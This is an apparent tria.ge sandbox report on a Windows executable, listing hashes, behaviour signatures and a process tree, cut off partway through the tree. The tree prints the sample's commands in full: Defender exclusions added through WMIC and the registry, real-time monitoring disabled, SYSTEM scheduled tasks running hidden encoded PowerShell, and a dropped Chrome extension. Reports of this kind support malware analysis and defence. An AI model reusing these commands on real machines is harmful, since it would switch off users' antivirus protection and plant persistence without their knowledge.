Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    230s
  • max time network
    231s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    18/04/2024, 23:17

General

  • Target

    f1e613aa58340e5448dc81b7e8835c9384222b1408b44612f1c4cfea36e9d0e0.exe

  • Size

    7.1MB

  • MD5

    7bc06927acca338a60cf1fed22b38513

  • SHA1

    e5a7f8ce191723bd1b4b36275c1023a1a13a6ff9

  • SHA256

    f1e613aa58340e5448dc81b7e8835c9384222b1408b44612f1c4cfea36e9d0e0

  • SHA512

    78a0d9246eb9f02789377f9cf291535fd233fc413e7cf4ba4ece33bc3ee85b1661f8904932813a8299efa09346e349f65c084dcae8a3d5cf67f0dbdb902b319f

  • SSDEEP

    196608:91OK2zjVpYD8vDwJmaHxbS2Os9qP0eELp+Ap:3OK2tpRvDqRbhOZ0fV+Ap

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f1e613aa58340e5448dc81b7e8835c9384222b1408b44612f1c4cfea36e9d0e0.exe
    "C:\Users\Admin\AppData\Local\Temp\f1e613aa58340e5448dc81b7e8835c9384222b1408b44612f1c4cfea36e9d0e0.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2936
    • C:\Users\Admin\AppData\Local\Temp\7zSD59.tmp\Install.exe
      .\Install.exe /lwiadidNczLF "525403" /S
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2336
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2592
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2752
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2828
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 23:19:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\UlwfBXv.exe\" ZO /kzsite_idZZO 525403 /S" /V1 /F
        3⤵
        • Drops file in Windows directory
        • Creates scheduled task(s)
        PID:1952
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {6635587F-15AD-4EE3-B014-6E9E28A8D5FD} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\UlwfBXv.exe
      C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\UlwfBXv.exe ZO /kzsite_idZZO 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gEwNNfQfu" /SC once /ST 01:35:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Creates scheduled task(s)
        PID:2820
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gEwNNfQfu"
        3⤵
          PID:2384
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gEwNNfQfu"
          3⤵
            PID:1744
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:344
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:452
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:1156
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:784
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gbmIgPwIR" /SC once /ST 05:42:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Creates scheduled task(s)
                PID:1152
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gbmIgPwIR"
                3⤵
                  PID:1776
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gbmIgPwIR"
                  3⤵
                    PID:1592
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:1600
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:2200
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2956
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2756
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:2748
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:2572
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:2596
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:2892
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:2356
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:2432
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:2660
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2880
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\heXdjphsLYtTYYrU\JQOmWvNw\yryJsmrelPIpAWoY.wsf"
                                    3⤵
                                      PID:2472
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\heXdjphsLYtTYYrU\JQOmWvNw\yryJsmrelPIpAWoY.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:1624
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2500
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2884
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:3000
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2488
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2872
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2948
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2964
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:3032
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1752
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2832
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2800
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:3036
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2008
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1512
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2304
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:540
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2780
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2084
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:2532
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:1488
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1932
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:2844
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:1848
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:844
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:1048
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:2404
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:1808
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1956
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:1736
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:1880
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:1612
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:1976
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:692
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:2340
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:1628
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:848
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gFGjVFSes" /SC once /ST 04:54:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:612
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gFGjVFSes"
                                                                          3⤵
                                                                            PID:2348
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gFGjVFSes"
                                                                            3⤵
                                                                              PID:2652
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:2452
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:2244
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2512
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2608
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "qXnxKrbPbFSTFetyh" /SC once /ST 19:29:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\jdvSoVG.exe\" ob /alsite_idxcF 525403 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2700
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "qXnxKrbPbFSTFetyh"
                                                                                      3⤵
                                                                                        PID:2848
                                                                                    • C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\jdvSoVG.exe
                                                                                      C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\jdvSoVG.exe ob /alsite_idxcF 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:3044
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bwrroZoeZRoQVpyAcj"
                                                                                        3⤵
                                                                                          PID:3008
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:2792
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:3032
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:3012
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1752
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:632
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                    PID:540
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                        PID:2272
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
